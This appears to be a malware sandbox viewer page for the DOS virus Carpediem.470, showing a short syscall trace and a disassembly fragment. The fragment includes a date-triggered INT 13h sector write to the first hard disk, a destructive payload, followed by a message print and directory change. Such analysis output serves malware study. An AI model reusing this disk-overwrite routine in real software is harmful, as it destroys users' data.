Sample viewer

vx.netlux.org/Virus.DOS.Riot.Carpediem.470

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:49:54.562357144Z 26 PC: 12b93 | Set disk transfer address
2018-12-17T22:49:54.564133853Z 25 PC: 12ba7 | Get default drive
2018-12-17T22:49:54.56690019Z 44 PC: 12c83 | Get time 0x12c83: cmp dl, 5
0x12c86: ja 0x12c9f
0x12c88: mov ax, 0x301
0x12c8b: mov cx, 1
0x12c8e: mov dx, 0x80
0x12c91: lea bx, word ptr [bp + 0x100]
0x12c95: int 0x13
0x12c97: mov ah, 9
0x12c99: lea dx, word ptr [bp + 0x285]
0x12c9d: int 0x21
0x12c9f: lea si, word ptr [bp + 0x2ce]
0x12ca3: mov di, 0x100
0x12ca6: movsw word ptr es:[di], word ptr [si]
0x12ca7: movsw word ptr es:[di], word ptr [si]
0x12ca8: lea dx, word ptr [bp + 0x302]
0x12cac: mov ah, 0x3b
0x12cae: int 0x21
0x12cb0: mov bx, 0x100
0x12cb3: push bx
0x12cb4: xor ax, ax
2018-12-17T22:49:54.569682998Z 59 PC: 12cb0 | Change current directory